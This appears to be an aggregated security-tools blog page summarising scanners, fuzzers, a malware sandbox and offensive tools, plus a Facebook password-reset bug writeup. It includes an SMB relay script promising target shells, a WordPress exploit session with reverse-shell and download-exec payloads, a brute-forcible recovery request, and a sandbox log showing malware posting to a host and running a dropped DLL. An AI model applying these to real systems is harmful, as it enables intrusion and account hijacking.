Fast And Full-Featured SSL Scanner - SSLyze

SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify mis-configurations affecting their SSL servers.

Key features include:

• Multi-processed and multi-threaded scanning: it's very fast.
• Support for all SSL protocols, from SSL 2.0 to TLS 1.2.
• NEW: SSLyze can also be used as a library, in order to run scans and process the results directly from Python.
• Performance testing: session resumption and TLS tickets support.
• Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more.
• Server certificate validation and revocation checking through OCSP stapling.
• Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP, PostGres and FTP.
• Support for client certificates when scanning servers that perform mutual authentication.
• Scan results can be written to an XML or JSON file for further processing.
• And much more !

Getting Started

SSLyze can be installed directly via pip:

pip install sslyze

It is also easy to directly clone the repository and the fetch the requirements:

git clone https://github.com/nabla-c0d3/sslyze.git
cd sslyze
pip install -r requirements.txt --target ./lib

Then, the command line tool can be used to scan servers:

python sslyze_cli.py --regular www.yahoo.com:443 www.google.com

SSLyze has been tested on the following platforms: Windows 7 (32 and 64 bits), Debian 7 (32 and 64 bits), OS X El Capitan.


Usage as a library

Starting with version 0.13.0, SSLyze can be used as a Python module in order to run scans and process the results directly in Python:

# Script to get the list of SSLv3 cipher suites supported by smtp.gmail.com
hostname = 'smtp.gmail.com'
try:
    # First we must ensure that the server is reachable
    server_info = ServerConnectivityInfo(hostname=hostname, port=587,
                                         tls_wrapped_protocol=TlsWrappedProtocolEnum.STARTTLS_SMTP)
    server_info.test_connectivity_to_server()
except ServerConnectivityError as e:
    raise RuntimeError('Error when connecting to {}: {}'.format(hostname, e.error_msg))

# Get the list of available plugins
sslyze_plugins = PluginsFinder()

# Create a process pool to run scanning commands concurrently
plugins_process_pool = PluginsProcessPool(sslyze_plugins)

# Queue a scan command to get the server's certificate
plugins_process_pool.queue_plugin_task(server_info, 'sslv3')

# Process the result and print the certificate CN
for plugin_result in plugins_process_pool.get_results():
    if plugin_result.plugin_command == 'sslv3':
        # Do something with the result
        print 'SSLV3 cipher suites'
        for cipher in plugin_result.accepted_cipher_list:
            print '    {}'.format(cipher.name)

The scan commands are same as the ones described in the sslyze_cly.py --help text.
They will all be run concurrently using Python's multiprocessing module. Each command will return a PluginResult object with attributes that contain the result of the scan command run on the server (such as list of supported cipher suites for the --tlsv1 command). These attributes are specific to each plugin and command but are all documented (within each plugin's module).
See api_sample.py for more examples of SSLyze's Python API.


Windows executable

A pre-compiled Windows executable is available in the Releases tab. The package can also be generated by running the following command:

python.exe setup_py2exe.py py2exe

Download SSLyze

Read More

An Anonymous VPN-Adapter (P2P layer 3 VPN based on Tor or I2P) - OnionCat

OnionCat is a VPN-adapter which allows to connect two or more computers or networks through VPN-tunnels. It is designed to use the anonymization networks Tor or I2P as its transport, hence, it provides location-based anonymity while still creating tunnel end points with private unique IP addresses.

OnionCat uses IPv6 as native layer 3 network protocol. The clients connected by it appear as on a single logical IPv6 network as being connected by a virtual switch. OnionCat automatically calculates and assigns unique IPv6 addresses to the tunnel end points which are derived from the hidden service ID (onion ID) of the hidden service of the local Tor client, or the local I2P server destination, respectively. This technique provides authentication between the onion ID and the layer 3 address, hence, defeats IP spoofing within the OnionCat VPN.

If necessary, OnionCat can of course transport IPv4 as well. Although it has native IP support, the suggested way to do this is to configure an IPv4-in-IPv6 tunnel.

Download OnionCat

Read More

Fuzzing Framework Written In Python - Kitty

Kitty is an open-source modular and extensible fuzzing framework written in python, inspired by OpenRCE's Sulley and Michael Eddington's (and now Deja Vu Security's) Peach Fuzzer .

Goal

When we started writing Kitty, our goal was to help us fuzz unusual targets --- meaning proprietary and esoteric protocols over non-TCP/IP communication channels --- without writing everything from scratch each time. A generic and abstract framework that would include the common functionallity of every fuzzing process we could think of, and would allow the user to easily extend and use it to test their specific target.

Features

With this goal in mind, the following features were very important to us:

Modularity:	Each part of the fuzzer stands on its own. This means that you can use the same monitoring code for different applications, or the same payload generator (aka Data Model ) for testing parsing of the same data that is received over different channels.
Extensibility:	If you need to test something "new", you will not need to change Kitty's core code. Most, if not all, features can be implemented in the user code. This includes monitoring, controlling and communicating with the fuzzed target.
Rich data modeling:	The data model core is rich and allows describing advanced data structures, including strings, hashes, lengths, conditions and many more. And, like most of the framework, it is designed to be extended even further as necessary.
Stateful:	Support for multi-stage fuzzing tests. Not only you can describe what the payload of an individual message will look like, you can also describe the order of messages, and even perform fuzzing on the sequence's order.
Client and Server fuzzing:	You can fuzz both servers and clients, assuming you have a matching stack. Sounds like a big requirement, but it isn't: it just means that you should have the means to communicate with the target, which you should have in most cases anyway.
Cross platform:	Runs on Linux, OS X and Windows. We don't judge ;-)

What it's not?

Well, Kitty is not a fuzzer. It also contains no implementation of specific protocol or communication channel. You can write your own fuzzer with it, and you can use Kitty-based code of others, but it's not an out-of-the-box fuzzer.

A good place to get (and add) implementations of Kitty models is Katnip.

Katnip

Kitty, as a framework, implements the fuzzer main loop, and provides syntax for modeling data and base classes for each of the elements that are used to create a full fuzzing session. However, specific implementations of classes are not part of the Kitty framework. This means that Kitty defines the interface and base class to perform data transactions with a target, but it doesn't provide implementations for data transmition over HTTP, TCP or UART.

Implementations of all sorts of classes can be found in the complimentary repository - Katnip .

What's Next?

• Install Kitty:
  

  pip install git+https://github.com/cisco-sas/kitty.git#egg=kitty

• Read some of the documentation at ReadTheDocs .
  
• Build your fuzzer :-)
  
• Need some help - ask at our google group: kitty-fuzzer@googlegroups.com 

Download Kitty

Read More

An Automated SMB Relay Script - Chuckle

Chuckle is an automated SMB Relay Script.


Chuckle requires a few tools to work:

• SMBRelayX.py
• Veil (latest version from git)
• Responder (Chuckle will detect which version you are using.)
• Nmap
• Nbtscan (unixwiz)
• MSFconsole

Usuage should be fairly simple, run as root or use sudo:

sudo ./chuckle.sh

Wait a while or coax a prvileged user into authenticating against you and you should end up with a shell on your target machine.

Be careful when running this and never run on a network you are not permitted to do so.

Download Chuckle

Read More

HackSys Extreme Vulnerable Driver - HEVD

HackSys Extreme Vulnerable Driver is intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level.

HackSys Extreme Vulnerable Driver caters wide range of vulnerabilities ranging from simple Buffer Overflows to complex Use After Frees and Pool Overflows . This allows the researchers to explore the exploitation techniques for every implemented vulnerabilities.

Screenshots

Vulnerabilities Implemented

• Pool Overflow
• Use After Free
• Type Confusion
• Stack Overflow
• Integer Overflow
• Stack Overflow GS
• Arbitrary Overwrite
• Null Pointer Dereference

Building Driver

1. Install Windows Driver Kit
2. Change %localSymbolServerPath% in Build_HEVD_Secure.bat an Build_HEVD_Vulnerable.bat driver builder
3. Run the appropriate driver builder Build_HEVD_Secure.bat or Build_HEVD_Vulnerable.bat

Installing Driver

Use OSR Driver Loader to install HackSys Extreme Vulnerable Driver


Testing

The HackSys Extreme Vulnerable Driver and the respective exploits have been tested on Windows 7 SP1 x86

Presentations

Presentation will be uploaded soon .

Sessions Conducted

• Windows Kernel Exploitation 1
• Windows Kernel Exploitation 2
• Windows Kernel Exploitation 3
• Windows Kernel Exploitation 4
• Windows Kernel Exploitation 5

Workshops Conducted

• Windows Kernel Exploitation Humla Pune
• Windows Kernel Exploitation Humla Mumbai

TODO

1. Test the Driver on Windows 8.1/10 x64
2. Add the exploit support for Windows 8.1/10 x64
3. Add Use Of Uninitialized Variable Vulnerability
4. Add Memory Disclosure Vulnerability
5. Add Time-Of-Check-To-Time-Of-Use ( TOCTTU/Race Condition ) Vulnerability
6. Refactor and Cleanup the driver and exploit source code

Download HEVD

Read More

Check UNIX/Linux Systems For Privilege Escalation - Climber

Automated auditing tool to check UNIX/Linux systems misconfigurations which may allow local privilege escalation.

Dependencies

• python >= 2.7
• python-crypto
• python-mako
• python-paramiko

Note

Climber needs Exscript, a Python module and a template processor for automating network connections over protocols such as Telnet or SSH.
https://github.com/knipknap/exscript
This module is already included in Climber sources.

Download Climber

Read More

Sandbox for semi-automatic Javascript malware analysis and payload extraction - Malware-Jail

Sandbox for semi-automatic Javascript malware analysis and payload extraction. Written for Node.js

malware-jail is written for Node's 'vm' sandbox . Currently implements WScript (Windows Scripting Host) context env/wscript.js , at least the part frequently used by malware. Internet browser context is partialy implemented env/browser.js .

Runs on any operating system, tested on Linux (Node v4.2.1).

Prerequisites

You'll need Node.js and npm .
malware-jail requires minimist , and xmlhttprequest and entities npm packages, you may install them with:

npm install

or

npm install minimist xmlhttprequest entities

Warning
Be careful when working with a real malware. A malware, which is aware of this sandbox, may try to escape and harm your PC. It's recommended you run it either from an unpriviledged Linux account or from within virtualized Windows machine. Angler files in the malware folder are NOT disarmed.

Usage

bash@linux# node jailme.js -h
11 Jan 00:07:39 - Malware sandbox ver. 0.2
11 Jan 00:07:39 - ------------------------
11 Jan 00:07:39 - Usage: node jailme.js  [[-e file1] [-e file2] .. ] [-o ofile] [-s odir] [--down=y] [malware1 [malware2] .. ]
11 Jan 00:07:39 -       -e ifile ... js that simulates specific environment
11 Jan 00:07:39 -       -o ofile ... name of the file where sandbox shall be dumped at the end
11 Jan 00:07:39 -       -s odir  ... output directory for generated files (malware payload)
11 Jan 00:07:39 -       --down=y ... use http request to download malware components automatically
11 Jan 00:07:39 -       malware  ... js with the malware code
11 Jan 00:07:39 - If no arguments are specified the default values are taken from config.json

In the examples folder you may find a deactivated malware file. Run the analysis with:

node jailme.js malware/example.js

or just simply:

node jailme.js

Internet browser based malware you may test with

node jailme.js malware/example_browser.js

The malware/example.js is the default malware file configured in config.json.
After analysis the complete sandbox context is dumped to a file 'sandbox_dump_after.json'. There you may find:

• _eval_calls - array of all eval() calls arguments. Useful if eval() is used for deobfucation.
• _wscript_saved_files - content of all files that the malware attempted to drop. The actual files are saved to the output/ directory too.
• _wscript_urls - all URLs that the malware intended to GET or POST.
• _wscript_objects - WScript or ActiveX objects created.

_'sandbox_dump_after.json' uses JSONPath , implemented by JSON-js/cycle.js , to save duplicated or cyclic references to a same object.

Sample output

bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 -  => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 -  => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 -  => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been  saved to: sandbox_dump_after.json

In the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf

Example: Analysing Angler EK

Download and extract Angler EK from a pcap file at ANGLER EK SENDS CRYPTOWALL into a malware/angler_full.html .
Strip the non Angler part and save as malware/angler_stripped.html .
Remove <script> tags and convert required <div> tags into:

document._addElementById(id, content);

and save as malware/angler.js .
Run the analysis:

node jailme.js malware/angler.js

Eventually capture the output:

node jailme.js malware/angler.js > angler_log.txt

Download  Malware-Jail

Read More

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems - Wordpress-Exploit-Framework

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.

What do I need to run it?

Ensure that you have Ruby 2.2.x installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running bundle install .

If bundler is not present on your system, you can install it by running gem install bundler .

How do I use it?

Open a command prompt / terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb .

Once loaded, you'll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.

Loading a module into your environment will allow you to set options with the set command and view information about the module using info .

Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.

wpxf > use exploit/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully

For a full list of supported commands, take a look at This Wiki Page .

What is the difference between auxiliary and exploit modules?

Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.

What payloads are available?

• bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
• custom: uploads and executes a custom PHP script.
• download_exec: downloads and runs a remote executable file.
• exec: runs a shell command on the remote server and returns the output to the WPXF session.
• reverse_tcp: uploads a script that will establish a reverse TCP shell.

All these payloads, with the exception of custom , will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.

How can I write my own modules and payloads?


Guides on writing modules and payloads can be found on The Wiki and full documentation of the API can be found at http://www.getwpxf.com/doc .

Download WEF

Read More

A Command To Search Port Names And numbers - Whatportis

It often happens that we need to find the default port number for a specific service, or what service is normally listening on a given port.


Usage

This tool allows you to find what port is associated with a service:

$ whatportis redis
+-------+------+----------+---------------------------------------+
| Name  | Port | Protocol | Description                           |
+-------+------+----------+---------------------------------------+
| redis | 6379 |   tcp    | An advanced key-value cache and store |
+-------+------+----------+---------------------------------------+

Or, conversely, what service is associated with a port number:

$ whatportis 5432
+------------+------+----------+---------------------+
| Name       | Port | Protocol | Description         |
+------------+------+----------+---------------------+
| postgresql | 5432 |   tcp    | PostgreSQL Database |
| postgresql | 5432 |   udp    | PostgreSQL Database |
+------------+------+----------+---------------------+

You can also search a pattern without knowing the exact name by adding the --like option:

$ whatportis mysql --like
+----------------+-------+----------+-----------------------------------+
| Name           |  Port | Protocol | Description                       |
+----------------+-------+----------+-----------------------------------+
| mysql-cluster  |  1186 |   tcp    | MySQL Cluster Manager             |
| mysql-cluster  |  1186 |   udp    | MySQL Cluster Manager             |
| mysql-cm-agent |  1862 |   tcp    | MySQL Cluster Manager Agent       |
| mysql-cm-agent |  1862 |   udp    | MySQL Cluster Manager Agent       |
| mysql-im       |  2273 |   tcp    | MySQL Instance Manager            |
| mysql-im       |  2273 |   udp    | MySQL Instance Manager            |
| mysql          |  3306 |   tcp    | MySQL                             |
| mysql          |  3306 |   udp    | MySQL                             |
| mysql-proxy    |  6446 |   tcp    | MySQL Proxy                       |
| mysql-proxy    |  6446 |   udp    | MySQL Proxy                       |
| mysqlx         | 33060 |   tcp    | MySQL Database Extended Interface |
+----------------+-------+----------+-----------------------------------+

Installation

$ pip install whatportis

JSON output

You can display the results as JSON, using the --json option :

$ whatportis 5432 --json
[
    {
        "description": "PostgreSQL Database",
        "protocol": "tcp",
        "name": "postgresql",
        "port": "5432"
    },
    {
        "description": "PostgreSQL Database",
        "protocol": "udp",
        "name": "postgresql",
        "port": "5432"
    }
]

REST API

Whatportis can also be started as a RESTful API server:

$ whatportis --server localhost 8080
 * Running on http://localhost:8080/ (Press CTRL+C to quit)

$ curl http://localhost:8080/ports
"ports": [
  {
    "description": "Description",
    "name": "Service Name",
    "port": "Port Number",
    "protocol": "Transport Protocol"
  },
  ...
]


$ curl http://localhost:8080/ports/3306
{
  "ports": [
    [
      "mysql",
      "3306",
      "tcp",
      "MySQL"
    ],
    [
      "mysql",
      "3306",
      "udp",
      "MySQL"
    ]
  ]
}

$ curl http://localhost:8080/ports/mysql?like
{
  "ports": [
    [
      "mysql-cluster",
      "1186",
      "tcp",
      "MySQL Cluster Manager"
    ],
    [
      "mysql-cluster",
      "1186",
      "udp",
      "MySQL Cluster Manager"
    ],
    ...
}

Notes

• "Why not use grep <port> /etc/services " ? Simply because I want a portable command that display the output in a nice format (a pretty table).
• The tool uses the Iana.org website to get the official list of ports. A private script has been created to fetch regularly the website and update the ports.json file. For this reason, an update command will be created in a future version.

Download  Whatportis

Read More

Facebook Password reset vulnerability allowed hackers to hijack any FB account

Hacking Facebook is one of the most sought queries on Google search because a lot of Facebook accounts are valuable. So much so that security researchers spend their valuable time and resources to hunt for vulnerabilities in Facebook in search of that elusive big break. One such ethical researcher, Anand Prakash has hit a jackpot with hacking Facebook. He has found a critical vulnerability in Facebook which could have allowed him to hack into any FB account without a sweat.

The vulnerability which Prakash found, resides in the way Facebook’s beta pages handle ‘Forgot Password’ requests. Normally, when you forget your password, Facebook gives you an option to get back into your FB account using ‘Forgot Password’ option which then sends a 6 digit code on your phone number/email address to your mobile phone. After you enter this code in the window, you are able to access your FB account and reset your password.

Prakash decided to test the vulnerability in Facebook’s Forgot Password mechanism. He tried to brute force the 6 digit code in the ‘Forgot Password’ window but since Facebook has placed a limit of 12 attempts he was unsuccessful and locked out after 12 attempts.

He then turned his attention to Facebook’s beta pages,  beta.facebook.com and mbasic.beta.facebook.com and found that the rate limit was missing on forgot password endpoints in these two pages. Once he found that there was no limitation, he could brute force into any Facebook account without worrying about the limits.

Vulnerable request:


POST /recover/as/code/ HTTP/1.1 Host: beta.facebook.com
lsd=AVoywo13&n=XXXXX


Brute forcing the “n” successfully allowed Prakash to set new password for any Facebook user.

Video of the Proof of Concept

Prakash reported the issue to the Facebook’s security team on 22nd Feb 2016. Facebook immediately acknowledged the severity of the vulnerability and issued a fix on 23rd Feb.  It also awarded Prakash a bug bounty of $15,000 which is among the top bounties by the networking giant.

By OffensiveSec

Read More

Directory with various materials for studies hacking

Obs, I am not responsible by your act with hacking materials, the materials is responsibility the student 

Directory with various materials for studies hacking, reverse engineering, malware, PenTest tools etc.

By OffensiveSec

Access Ebooks

Read More

Hacking Ebooks ++ VI

Best Hacking EBooks 2016 – In the Era of Teenagers many of want to Become a “Hacker” But In-fact It is not an Easy Task because Hacker’s have Multiple Programming Skills and Sharp Mind that Find Vulnerability in the Sites, Software and Other types of Application. If You want to become a Hacker you need to Spend most of the Time on your Computer to Learn New Technologies and Reading Hacking Book that can Help you to Become a Ethical Hacker. First You need to Read Hacking Books Carefully then Perform Practically not for Hacking Purpose Just only for Educational Purpose.

Access Ebooks

Read More